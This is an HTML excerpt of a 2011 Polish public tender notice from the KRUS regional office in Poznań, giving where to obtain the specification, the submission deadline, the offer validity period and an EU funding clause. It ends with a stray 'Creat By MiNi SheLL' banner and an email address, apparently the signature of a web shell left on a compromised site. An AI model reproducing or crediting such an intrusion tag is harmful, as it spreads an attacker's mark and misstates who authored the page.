<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu ul. Św. Marcin 46/50, 60-959 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 10:00, miejsce: Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Poznaniu ul. Św. Marcin 46/50, 60-959 Poznań , piętro VI, pok. 601.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com